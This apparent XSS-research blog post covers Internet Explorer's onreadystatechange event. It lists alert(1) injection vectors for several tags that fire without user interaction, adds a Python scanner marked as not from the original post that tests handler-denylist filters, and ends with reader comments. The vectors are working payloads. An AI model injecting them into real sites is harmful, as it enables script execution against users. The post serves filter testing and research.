onreadystatechange

I like this event, it’s pretty cool. The reason why it’s interesting from an XSS perspective is that it is executed automatically without user interaction. This is rare in the XSS playground; usually you have to use onerror, onload or onfocus events, and they only work in certain circumstances.

I’d better mention that the event is only relevant to Internet Explorer as far as I’m aware. If you know of any other browsers it works in then please leave a comment.

So which tags does it execute in? Well, more than you first think. At first I could only get it to execute automatically with the iframe, script and style tags. But actually the img, image, input, isindex, iframe, script, style, xml and object tags all execute without user interaction.

Here is a list of vectors I found. Notice that the XML tag requires some content in order to execute; this can be accomplished without a closing tag or with just some text. The object tag requires the type=image attribute. IMG, IMAGE, ISINDEX and INPUT all require a valid image loaded with the src attribute.

<script onreadystatechange=alert(1)>
<iframe onreadystatechange=alert(1)>
<style onreadystatechange=alert(1)>
<script onreadystatechange=alert(1)></script>
<iframe onreadystatechange=alert(1)></iframe>
<style onreadystatechange=alert(1)></style>
<xml onreadystatechange=alert(1)>
<xml onreadystatechange=alert(1)>test</xml>
<object type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)></object>
<img type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<image type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<input type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<isindex type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
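As an added example that is not part of the original post: a small Python check, built on the standard-library html.parser, that runs the vectors above through two filter policies. It shows that a denylist of the familiar handlers (onerror, onload, onfocus) passes every one of these vectors, while rejecting any attribute whose name starts with on catches them all; the image URL in the sample vectors is a constructed placeholder, not the post's.

```python
"""Scan untrusted HTML for inline event handlers (defensive filter check)."""
from html.parser import HTMLParser

# Tags the post reports as firing onreadystatechange in IE with no interaction.
AUTO_FIRE_TAGS = {"img", "image", "input", "isindex", "iframe",
                  "script", "style", "xml", "object"}
# Handlers a naive filter typically blocks; onreadystatechange is not among them.
KNOWN_HANDLERS = {"onerror", "onload", "onfocus"}


class HandlerScanner(HTMLParser):
    """Collect (tag, attribute) for every attribute whose name starts with 'on'."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases names; a bare attribute has the value None.
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append((tag, name))


def find_event_handlers(markup):
    """Return [(tag, attr)] for every inline event handler in the markup."""
    scanner = HandlerScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings

def blocked_by_known_handler_filter(markup):
    """Denylist policy: rejects only the well-known handlers."""
    return any(attr in KNOWN_HANDLERS for _, attr in find_event_handlers(markup))

def blocked_by_any_handler_filter(markup):
    """Stricter policy: no on* attribute is allowed at all."""
    return bool(find_event_handlers(markup))

def fires_without_interaction(markup):
    """True if an onreadystatechange handler sits on one of the post's tags."""
    return any(attr == "onreadystatechange" and tag in AUTO_FIRE_TAGS
               for tag, attr in find_event_handlers(markup))


IMG = "http://example.invalid/logo.gif"  # constructed placeholder URL
SAMPLE_VECTORS = [  # constructed from the post's list
    "<script onreadystatechange=alert(1)>",
    "<xml onreadystatechange=alert(1)>test</xml>",
    f"<object type=image src={IMG} onreadystatechange=alert(1)></object>",
    f"<input type=image src={IMG} onreadystatechange=alert(1)>",
]
```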

3 Responses to “onreadystatechange”

  1. Klaas writes:

    Hey,
    I’ve tried this in IE6 and IE8 but cannot reproduce it. Even the <script onreadystate=alert(1)> didn’t work for me.

    Can you explain a bit more how you achieved it? Otherwise I would say IE is not vulnerable…

  2. Gareth Heyes writes:

    It should be onreadystatechange, sorry, I must have been tired.

  3. Kai Sellgren writes:

    I just wrote a big reply, but it appeared to be spam…

    Great.

    You should fix your site.